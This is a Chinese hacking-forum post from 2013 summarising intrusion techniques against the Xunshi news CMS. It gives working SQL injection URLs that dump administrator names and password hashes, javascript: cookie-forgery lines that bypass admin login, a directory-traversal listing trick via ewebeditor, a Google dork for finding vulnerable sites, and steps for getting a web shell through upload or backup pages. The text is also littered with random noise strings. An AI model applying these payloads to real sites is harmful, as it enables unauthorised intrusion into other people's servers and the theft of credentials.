找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2468|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
1 T- p* F9 H+ B+ {3 M& _/ D. I6 h5 G$ H+ v+ O( x; v! e/ Q4 |
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)- i* Y" y. T: M1 E- K8 t

- @" K- \9 E# K0 J以下本文总结来自黑防去年第9期杂志上的内容...
: _; E% R% C9 f. l) l$ Y4 F
/ d- B# h( N3 C2 o1 [先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
. `3 Q. C9 C3 Y* w: H0 u4 F  N* R  z' |: S# V7 G
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 . @& b& H1 M3 c) b7 T. R
+ }* c( ?; I% z5 y6 R5 w
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况! G6 \; F" b8 H/ M  N6 u
这里一个注入
- c! t1 `" U( Y3 C4 P. L, z
, T/ ~  U# }- ^效果如图:
& a. \7 x$ m1 e, m3 _8 a1 x
! N1 J9 K9 P0 ?, Q
8 H' D$ t* o, y  s' X3 D1 Q/ [/ C3 x
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.2 b5 E- e6 |2 @; M% P
4 D0 L$ T+ q7 _% {5 a
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
7 A) ?; w% M% h# ?
: f, }% M6 V5 x0 D! Y! @javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));8 Y8 d4 n) F% \5 |
* `8 F4 Y, {5 `4 r: |( k/ d1 I
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:, F7 u* N" k, t' x5 g

1 |, ?2 z/ z: c7 a8 q7 J因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
7 u2 Q$ N0 N8 G
  j2 o4 x  |0 \# S* M* Z0 h: x它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以; E! t0 g) s7 l6 K6 g0 E
8 g. D6 Z3 G1 D
访问这页面来列目录..步骤如下:6 Z0 S* ~* k$ N: I

, |' O' e8 V+ {- ~javascript:alert(document.cookie="admindj=1") # g. p% C* T2 b
! ?% S2 H* d, I& A; R
http://www.political-security.co ... asp?id=46&dir=../..
# B; {- ?8 ]! O' {+ f9 o6 q
; D6 q; V8 j$ t, B& W# c& i; |效果如图:
7 B$ P2 D! I* z+ `7 f
! k  ^, M7 a0 l( O9 L
) m" C* L  C5 ^# j: q) [
+ k- J  D7 z4 ]# d这样全站目录都能瞧了..找到后台目录..进去..
; s# Y/ \# w/ T/ N" w4 z1 J
. l3 [" u$ O( K7 R$ J9 H. q& G那么进了后台怎么拿shell??上传--备份就ok了..
, H8 H. d. u- R2 s! b2 q
# T  f1 `# x; u( n! Z( \那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
4 _! U' R2 J2 Y! L2 C/ t- I2 g: a! q8 G1 z7 x) D
这个我也碰到过一次..你都可以通过列目录来实现... D3 {# T: j" d2 _# E9 w

1 \9 ~, z* j' O% h8 d1 k# wjavascript:alert(document.cookie="admindj=1") " f+ L! f7 m# \. P" ]

3 u, H2 f1 J. x$ L# L$ uhttp://www.political-security.co ... p?action=BackupData   O$ N: X. b& k1 [9 `' m; M" N

( p7 b8 K( K5 X: T/ `备份ok..; ]: d7 V0 q$ O3 n7 l3 z

" E# b! J& h2 Q那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?' @& S9 Y* ?- ?. I! g: f1 Q& j

. G) [$ z+ j. K4 Y在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
- m) n$ `& B, a! M) e9 I
$ C: P) o, ~( A/ ?' ~# l/ ?然后访问此页面进行注入..步骤如下:
! h% c( y) S/ T: c' A
: i3 N2 W3 Y% O1 ]7 Xjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")) i# v" k( v# p5 s4 D, ?. p
0 {7 ?3 h" k  ~2 {% M2 i3 ~
然后请求admin/admin_chk.asp页面/ \, s; Q+ W7 M, L) g2 u

- ?, C+ x4 v6 ?8 Q0 R4 d1 X1 _输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
! N7 E% b; N6 @' J% J
. f9 f2 P& H8 e0 S5 |& @26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin8 z5 G8 K' G  W, L; @/ C  B
3 t+ k1 w) I% g/ }$ ~/ N7 p
效果如图所示:- D4 ]* l& b1 Z: s

; `& L4 j  V# I# |& b+ s 2 J# \1 ]' k1 s# W8 p" K
' o0 [" M, d$ Q/ F% U1 g
讯时漏洞2* i9 \0 ?# n! O9 I/ |9 l3 V
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
, o* E2 A$ \, N0 U7 ^ % v8 Q; F- P! H: g4 Z9 x
1、/admin/admin_news_pl_view.asp?id=1
* y  u) e0 y) t4 c//id任意 填入以下语句# ?( y7 M3 r9 f7 l% f+ X
$ b2 d$ ?5 N* B/ \# Z
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!! j( |* [" Y8 H# K) @9 @* @
4 g* N7 O: P( Y1 G3 D' Y

$ q, `, A$ F) q6 ^: @* j
) b5 L) ~& K& F3 M8 |8 y! [% D3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
" |3 N& b2 k+ l0 Z7 Y  @$ a6 o; E
0 D$ B9 r& I; H- Q" a: S) S( Y, g* s& t0 I: O

" h2 y% C# N/ a  A4 \/ e+ m# U' _爆出管理员帐号和密码了
9 ^: H% G% U8 T. B5 f 1 L3 B& [& v& f

9 X, Y* Q/ I6 `& Q. r4 Z2 H# E1 n: |' V" T* j( i8 I' D/ l/ }
4、cookies进后台
# ^. G- b1 ?* m" N+ U% g
' |+ j5 b! v" o' N' F8 Cjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5 ^/ y. ^: E$ D9 N; `+ [" b8 X ; X/ v5 U5 \5 n. y( j
' |! x& s' B3 E

/ o: N* Q2 i. O5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
7 W# T% d& ^# J; B ! _8 E' K) O. {2 `& g: X
8 N5 _) B5 V& L+ }' Z

  o4 Z& C3 P+ m% o! P  `5 s6、后台有上传和备份取SHELL不难。$ l  t) p% g. d2 C5 o% E

$ B* r2 g5 f/ I0 z& [+ i7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..& K) b0 b2 N1 Z3 {9 M
+ |: }' i3 g/ Z0 N7 W9 G7 ]
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!  L6 G5 M5 t  u  u

- l( H, D; Y; H3 K! M/ P+ E, G- E, Y9 Z; _% }$ N- J
+ p+ R; t' {- N0 v+ `. }, N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表